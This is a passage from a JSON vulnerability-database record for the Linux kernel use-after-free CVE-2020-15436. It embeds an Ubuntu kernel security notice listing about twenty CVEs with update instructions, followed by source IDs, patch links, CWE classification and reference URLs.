v1\n\niQIVAwUBYBlBsdzjgjWX9erEAQhTZhAAmSFzEZeB0CWYNaJ2PVwoFm4PA9rdYDyg\nG1j/plxrO6bczNEz+XDnAzRPrCbJRPPt6VJxjpLkb25ph0f5tQ+Q7Ph7sAefSbDX\nBLDjjvl+Wd1g2FEfIQ43wDp8UWuFCVVMF3ajJHFz9ROqrA/1hs0gj7ht9gXRlttT\nLSI67A08tEWRPtaf5c1M8h/IJtZiF4sfYDrfhp4mFRTZYybTvVjML+xf69Qq7o2D\nAsxbyKRVNQKC0Epm6C+Tzbw6SxhonrAQyjADWenQ8bCS2TF8WY2OZA7sNs7nddZu\nHa/mCB2vSR2WCWLGxCLXTtsK3y52qPIyUn4mBmatJUIBcbJMnQbgZgWrEcTobsoD\nN5MWdqE6xGjct0KMz0fV6J9D5JWQjUN4O8K0vVQP4aoAX25jMWCq14RLLRUvusJm\ndLI59E5nN1pLMlADiAAh2Iceac/daIF9fvWn2XoF16/ZQNffa0yCiNFaDg+AW4Tg\nZ/b82VoOiz7uJWyv06TMcljafEaIxjpnjGmpKQ2qz8UYoxYYsnRyKpHJxLeiB53A\nTKbkiQJoFutNeUcbBSA6F6sqLlaJ7CtoyzxsVVwM+LtYF1iUXqC+Hp6Gs5NB8WXr\nJQSrrv0X0H7sAu7FHCyL/ygMQK/IiZKiPxiRBZJH6pJz5OL8GVKxR1CSZmHXvgKo\nQPLPtfMOGPs=Hdxh\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. 7) - aarch64, noarch, ppc64le\n\n3. ==========================================================================\nUbuntu Security Notice USN-4752-1\nFebruary 25, 2021\n\nlinux-oem-5.6 vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 20.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. \n\nSoftware Description:\n- linux-oem-5.6: Linux kernel for OEM systems\n\nDetails:\n\nDaniele Antonioli, Nils Ole Tippenhauer, and Kasper Rasmussen discovered\nthat legacy pairing and secure-connections pairing authentication in the\nBluetooth protocol could allow an unauthenticated user to complete\nauthentication without pairing credentials via adjacent access. A\nphysically proximate attacker could use this to impersonate a previously\npaired Bluetooth device. (CVE-2020-10135)\n\nJay Shin discovered that the ext4 file system implementation in the Linux\nkernel did not properly handle directory access with broken indexing,\nleading to an out-of-bounds read vulnerability. A local attacker could use\nthis to cause a denial of service (system crash). (CVE-2020-14314)\n\nIt was discovered that the block layer implementation in the Linux kernel\ndid not properly perform reference counting in some situations, leading to\na use-after-free vulnerability. A local attacker could use this to cause a\ndenial of service (system crash). (CVE-2020-15436)\n\nIt was discovered that the serial port driver in the Linux kernel did not\nproperly initialize a pointer in some situations. A local attacker could\npossibly use this to cause a denial of service (system crash). \n(CVE-2020-15437)\n\nAndy Nguyen discovered that the Bluetooth HCI event packet parser in the\nLinux kernel did not properly handle event advertisements of certain sizes,\nleading to a heap-based buffer overflow. A physically proximate remote\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2020-24490)\n\nIt was discovered that the NFS client implementation in the Linux kernel\ndid not properly perform bounds checking before copying security labels in\nsome situations. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code. (CVE-2020-25212)\n\nIt was discovered that the Rados block device (rbd) driver in the Linux\nkernel did not properly perform privilege checks for access to rbd devices\nin some situations. A local attacker could use this to map or unmap rbd\nblock devices. (CVE-2020-25284)\n\nIt was discovered that the block layer subsystem in the Linux kernel did\nnot properly handle zero-length requests. A local attacker could use this\nto cause a denial of service. (CVE-2020-25641)\n\nIt was discovered that the HDLC PPP implementation in the Linux kernel did\nnot properly validate input in some situations. A local attacker could use\nthis to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2020-25643)\n\nKiyin (\u5c39\u4eae) discovered that the perf subsystem in the Linux kernel did\nnot properly deallocate memory in some situations. A privileged attacker\ncould use this to cause a denial of service (kernel memory exhaustion). \n(CVE-2020-25704)\n\nIt was discovered that the KVM hypervisor in the Linux kernel did not\nproperly handle interrupts in certain situations. A local attacker in a\nguest VM could possibly use this to cause a denial of service (host system\ncrash). (CVE-2020-27152)\n\nIt was discovered that the jfs file system implementation in the Linux\nkernel contained an out-of-bounds read vulnerability. A local attacker\ncould use this to possibly cause a denial of service (system crash). \n(CVE-2020-27815)\n\nIt was discovered that an information leak existed in the syscall\nimplementation in the Linux kernel on 32 bit systems. A local attacker\ncould use this to expose sensitive information (kernel memory). \n(CVE-2020-28588)\n\nIt was discovered that the framebuffer implementation in the Linux kernel\ndid not properly perform range checks in certain situations. A local\nattacker could use this to expose sensitive information (kernel memory). \n(CVE-2020-28915)\n\nJann Horn discovered a race condition in the copy-on-write implementation\nin the Linux kernel when handling hugepages. A local attacker could use\nthis to gain unintended write access to read-only memory pages. \n(CVE-2020-29368)\n\nJann Horn discovered that the mmap implementation in the Linux kernel\ncontained a race condition when handling munmap() operations, leading to a\nread-after-free vulnerability. A local attacker could use this to cause a\ndenial of service (system crash) or possibly expose sensitive information. \n(CVE-2020-29369)\n\nJann Horn discovered that the romfs file system in the Linux kernel did not\nproperly validate file system meta-data, leading to an out-of-bounds read. \nAn attacker could use this to construct a malicious romfs image that, when\nmounted, exposed sensitive information (kernel memory). (CVE-2020-29371)\n\nJann Horn discovered that the tty subsystem of the Linux kernel did not use\nconsistent locking in some situations, leading to a read-after-free\nvulnerability. \n(CVE-2020-29660)\n\nJann Horn discovered a race condition in the tty subsystem of the Linux\nkernel in the locking for the TIOCSPGRP ioctl(), leading to a use-after-\nfree vulnerability. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code. (CVE-2020-29661)\n\nIt was discovered that a race condition existed that caused the Linux\nkernel to not properly restrict exit signal delivery. A local attacker\ncould possibly use this to send signals to arbitrary processes. \n(CVE-2020-35508)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 20.04 LTS:\n  linux-image-5.6.0-1048-oem      5.6.0-1048.52\n  linux-image-oem-20.04           5.6.0.1048.44\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. \n\nReferences:\n  https://usn.ubuntu.com/4752-1\n  CVE-2020-10135, CVE-2020-14314, CVE-2020-15436, CVE-2020-15437,\n  CVE-2020-24490, CVE-2020-25212, CVE-2020-25284, CVE-2020-25641,\n  CVE-2020-25643, CVE-2020-25704, CVE-2020-27152, CVE-2020-27815,\n  CVE-2020-28588, CVE-2020-28915, CVE-2020-29368, CVE-2020-29369,\n  CVE-2020-29371, CVE-2020-29660, CVE-2020-29661, CVE-2020-35508\n\nPackage Information:\n  https://launchpad.net/ubuntu/+source/linux-oem-5.6/5.6.0-1048.52\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-15436"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-013950"
      },
      {
        "db": "VULHUB",
        "id": "VHN-168414"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-15436"
      },
      {
        "db": "PACKETSTORM",
        "id": "161656"
      },
      {
        "db": "PACKETSTORM",
        "id": "163248"
      },
      {
        "db": "PACKETSTORM",
        "id": "162346"
      },
      {
        "db": "PACKETSTORM",
        "id": "161259"
      },
      {
        "db": "PACKETSTORM",
        "id": "161258"
      },
      {
        "db": "PACKETSTORM",
        "id": "161250"
      },
      {
        "db": "PACKETSTORM",
        "id": "161556"
      }
    ],
    "trust": 2.43
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2020-15436",
        "trust": 4.1
      },
      {
        "db": "PACKETSTORM",
        "id": "162346",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "161556",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "163248",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "161656",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "161250",
        "trust": 0.8
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-24-074-07",
        "trust": 0.8
      },
      {
        "db": "JVN",
        "id": "JVNVU93656033",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-013950",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202011-1793",
        "trust": 0.7
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.0377",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1148",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2203",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.0589",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2604",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1436",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.4391",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.4341",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.0365",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.0791",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.4377",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.0166",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.4410",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.6112",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.0717",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021042828",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021062303",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "161258",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "161259",
        "trust": 0.2
      },
      {
        "db": "CNVD",
        "id": "CNVD-2020-66297",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-168414",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-15436",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-168414"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-15436"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-013950"
      },
      {
        "db": "PACKETSTORM",
        "id": "161656"
      },
      {
        "db": "PACKETSTORM",
        "id": "163248"
      },
      {
        "db": "PACKETSTORM",
        "id": "162346"
      },
      {
        "db": "PACKETSTORM",
        "id": "161259"
      },
      {
        "db": "PACKETSTORM",
        "id": "161258"
      },
      {
        "db": "PACKETSTORM",
        "id": "161250"
      },
      {
        "db": "PACKETSTORM",
        "id": "161556"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202011-1793"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-15436"
      }
    ]
  },
  "id": "VAR-202011-0423",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-168414"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2024-03-23T21:25:15.898000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Fix\u00a0use-after-free\u00a0in\u00a0blkdev_get()",
        "trust": 0.8,
        "url": "http://www.kernel.org"
      },
      {
        "title": "Linux kernel Remediation of resource management error vulnerabilities",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=136428"
      },
      {
        "title": "Red Hat: Moderate: kernel-rt security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20210338 - security advisory"
      },
      {
        "title": "Red Hat: Moderate: kernel security, bug fix, and enhancement update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20210336 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel-alt security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20210354 - security advisory"
      },
      {
        "title": "Red Hat: Moderate: Red Hat Advanced Cluster Management 2.1.3 security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20210607 - security advisory"
      },
      {
        "title": "IBM: Security Bulletin: Vulnerabilities in the Linux Kernel, Samba, Sudo, Python, and tcmu-runner affect IBM Spectrum Protect Plus",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=ddbe78143bb073890c2ecb87b35850bf"
      },
      {
        "title": "IBM: Security Bulletin: IBM Data Risk Manager is affected by multiple vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=e9d6f12dfd14652e2bb7e5c28ded162b"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2020-15436"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-013950"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202011-1793"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-416",
        "trust": 1.1
      },
      {
        "problemtype": "Use of freed memory (CWE-416) [NVD evaluation ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-168414"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-013950"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-15436"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-15436"
      },
      {
        "trust": 1.8,
        "url": "https://security.netapp.com/advisory/ntap-20201218-0002/"
      },
      {
        "trust": 1.8,
        "url": "https://lkml.org/lkml/2020/6/7/379"
      },
      {
        "trust": 0.8,
        "url": "https://jvn.jp/vu/jvnvu93656033/index.html"
      },
      {
        "trust": 0.8,
        "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-07"
      },
      {
        "trust": 0.7,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-the-linux-kernel-samba-sudo-python-and-tcmu-runner-affect-ibm-spectrum-protect-plus/"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.6,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2020-15436"
      },
      {
        "trust": 0.6,
        "url": "https://source.android.com/security/bulletin/2021-04-01"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.4391/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.0717"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.4377/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.4410/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1148"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.4341/"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021042828"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/163248/red-hat-security-advisory-2021-2523-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/161250/red-hat-security-advisory-2021-0354-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2203"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021062303"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.6112"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.0365/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.0377/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/161656/red-hat-security-advisory-2021-0719-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/162346/red-hat-security-advisory-2021-1376-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-data-risk-manager-is-affected-by-multiple-vulnerabilities-4/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.0589"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1436"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2604"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.0791"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.0166/"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/linux-kernel-use-after-free-via-blkdev-get-34039"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/161556/ubuntu-security-notice-usn-4752-1.html"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-29661"
      },
      {
        "trust": 0.3,
        "url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-35513"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/updates/classification/#moderate"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-35513"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.3,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/errata/rhsa-2021:0338"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-29661"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/416.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20230"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12723"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_mana"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3121"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-14351"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-10878"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25705"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:0719"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3121"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-14351"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-20230"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25705"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-12723"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-10543"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-10878"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-10543"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-12362"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12362"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2523"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-27364"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:1376"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-28374"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-27363"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-27364"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-27365"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-27365"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-27363"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-28374"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:0336"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:0354"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-1749"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-1749"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-29660"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4752-1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25212"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-24490"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-10135"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25641"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-15437"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oem-5.6/5.6.0-1048.52"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-29369"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-27152"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-28915"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25704"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-27815"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25284"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25643"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-28588"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-14314"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-29371"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-29368"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-35508"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-168414"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-15436"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-013950"
      },
      {
        "db": "PACKETSTORM",
        "id": "161656"
      },
      {
        "db": "PACKETSTORM",
        "id": "163248"
      },
      {
        "db": "PACKETSTORM",
        "id": "162346"
      },
      {
        "db": "PACKETSTORM",
        "id": "161259"
      },
      {
        "db": "PACKETSTORM",
        "id": "161258"
      },
      {
        "db": "PACKETSTORM",
        "id": "161250"
      },
      {
        "db": "PACKETSTORM",
        "id": "161556"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202011-1793"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-15436"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-168414"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-15436"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-013950"
      },
      {
        "db": "PACKETSTORM",
        "id": "161656"
      },
      {
        "db": "PACKETSTORM",
        "id": "163248"
      },
      {
        "db": "PACKETSTORM",
        "id": "162346"
      },
      {
        "db": "PACKETSTORM",
        "id": "161259"
      },
      {
        "db": "PACKETSTORM",
        "id": "161258"
      },
      {
        "db": "PACKETSTORM",
        "id": "161250"
      },
      {
        "db": "PACKETSTORM",
        "id": "161556"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202011-1793"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-15436"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-11-23T00:00:00",
        "db": "VULHUB",
        "id": "VHN-168414"
      },
      {
        "date": "2020-11-23T00:00:00",
        "db": "VULMON",
        "id": "CVE-2020-15436"
      },
      {
        "date": "2021-07-16T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2020-013950"
      },
      {
        "date": "2021-03-04T15:33:19",
        "db": "PACKETSTORM",
        "id": "161656"
      },
      {
        "date": "2021-06-22T19:41:34",
        "db": "PACKETSTORM",
        "id": "163248"
      },
      {
        "date": "2021-04-27T15:32:47",
        "db": "PACKETSTORM",
        "id": "162346"
      },
      {
        "date": "2021-02-02T16:13:04",
        "db": "PACKETSTORM",
        "id": "161259"
      },
      {
        "date": "2021-02-02T16:12:50",
        "db": "PACKETSTORM",
        "id": "161258"
      },
      {
        "date": "2021-02-02T16:11:22",
        "db": "PACKETSTORM",
        "id": "161250"
      },
      {
        "date": "2021-02-25T15:31:12",
        "db": "PACKETSTORM",
        "id": "161556"
      },
      {
        "date": "2020-11-23T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202011-1793"
      },
      {
        "date": "2020-11-23T21:15:11.813000",
        "db": "NVD",
        "id": "CVE-2020-15436"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2022-10-19T00:00:00",
        "db": "VULHUB",
        "id": "VHN-168414"
      },
      {
        "date": "2020-12-18T00:00:00",
        "db": "VULMON",
        "id": "CVE-2020-15436"
      },
      {
        "date": "2024-03-22T07:12:00",
        "db": "JVNDB",
        "id": "JVNDB-2020-013950"
      },
      {
        "date": "2022-11-24T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202011-1793"
      },
      {
        "date": "2023-10-12T13:31:04.563000",
        "db": "NVD",
        "id": "CVE-2020-15436"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "161556"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202011-1793"
      }
    ],
    "trust": 0.7
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux\u00a0Kernel\u00a0 Vulnerability in using free memory in",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-013950"
      }
    ],
    "trust": 0.8
  },
  "type": {
